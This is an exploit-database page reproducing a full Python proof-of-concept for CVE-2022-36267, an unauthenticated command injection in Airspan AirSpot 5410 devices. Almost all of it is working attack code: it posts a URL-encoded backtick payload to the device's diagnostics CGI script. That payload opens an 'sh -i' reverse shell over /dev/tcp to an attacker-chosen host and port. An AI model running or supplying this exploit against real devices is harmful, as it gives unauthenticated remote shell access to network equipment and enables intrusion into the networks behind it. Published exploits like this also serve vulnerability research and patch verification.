Exploit for AirSpot 5410 0.3.4.1-4 Remote Command Injection CVE-2022-36267

Name: Exploit for AirSpot 5410 0.3.4.1-4 Remote Command Injection CVE-2022-36267
Rating: 5 (316 reviews)
2022-08-10 | CVSS -0.5
## https://sploitus.com/exploit?id=PACKETSTORM:168047
# -*- coding: utf-8 -*-  
  
# Exploit Title: AirSpot unauthenticated remote command injection  
# Date: 7/26/2022  
# Exploit Author: Samy Younsi (NSLABS) (https://samy.link)  
# Vendor Homepage: https://www.airspan.com/  
# Software Link: https://wdi.rfwel.com/cdn/techdocs/AirSpot5410.pdf  
# Version: 0.3.4.1-4 and under.  
# Tested on: Airspan AirSpot 5410 version 0.3.4.1-4 (Ubuntu)  
# CVE : CVE-2022-36267  
  
from __future__ import print_function, unicode_literals  
import argparse  
import requests  
import urllib3  
urllib3.disable_warnings()  
  
def banner():  
airspanLogo = """   
,-.  
/ \ `. __..-,O  
: \ --''_..-'.'  
| . .-' `. '.  
: . .`.'  
\ `. / ..  
\ `. ' .  
`, `. \  
,|,`. `-.\  
'.|| ``-...__..-`  
| | Airspan   
|__| AirSpot 5410  
/||\ PWNED x_x  
//||\\  
// || \\  
__//__||__\\__  
'--------------'Necrum Security Labs  
  
\033[1;92mSamy Younsi (Necrum Security Labs)\033[1;m \033[1;91mAirSpot 5410 CMD INJECTION\033[1;m   
FOR EDUCATIONAL PURPOSE ONLY.   
"""  
return print('\033[1;94m{}\033[1;m'.format(airspanLogo))  
  
def pingWebInterface(RHOST, RPORT):  
url = 'https://{}:{}'.format(RHOST, RPORT)  
try:  
response = requests.get(url, allow_redirects=False, verify=False, timeout=30)  
if response.status_code != 200:  
print('[!] \033[1;91mError: AirSpot 5410 device web interface is not reachable. Make sure the specified IP is correct.\033[1;m')  
exit()  
print('[INFO] Airspan device web interface seems reachable!')  
except:  
print('[!] \033[1;91mError: AirSpot 5410 device web interface is not reachable. Make sure the specified IP is correct.\033[1;m')  
exit()  
  
  
def execReverseShell(RHOST, RPORT, LHOST, LPORT):  
payload = '`sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F{}%2F{}%200%3E%261`'.format(LHOST, LPORT)  
data = 'Command=pingDiagnostic&targetIP=1.1.1.1{}&packetSize=55&timeOut=10&count=1'.format(payload)  
try:  
print('[INFO] Executing reverse shell...')  
response = requests.post('https://{}:{}/cgi-bin/diagnostics.cgi'.format(RHOST, RPORT), data=data, verify=False)  
print("Reverse shell successfully executed. {}:{}".format(LHOST, LPORT))  
return  
except Exception as e:  
print("Reverse shell failed. Make sure the AirSpot 5410 device can reach the host {}:{}").format(LHOST, LPORT)  
return False  
  
def main():  
banner()  
args = parser.parse_args()  
pingWebInterface(args.RHOST, args.RPORT)  
execReverseShell(args.RHOST, args.RPORT, args.LHOST, args.LPORT)  
  
  
if __name__ == "__main__":  
parser = argparse.ArgumentParser(description='Script PoC that exploit an nauthenticated remote command injection on Airspan AirSpot devices.', add_help=False)  
parser.add_argument('--RHOST', help="Refers to the IP of the target machine. (Airspan AirSpot device)", type=str, required=True)  
parser.add_argument('--RPORT', help="Refers to the open port of the target machine. (443 by default)", type=int, required=True)  
parser.add_argument('--LHOST', help="Refers to the IP of your machine.", type=str, required=True)  
parser.add_argument('--LPORT', help="Refers to the open port of your machine.", type=int, required=True)  
main()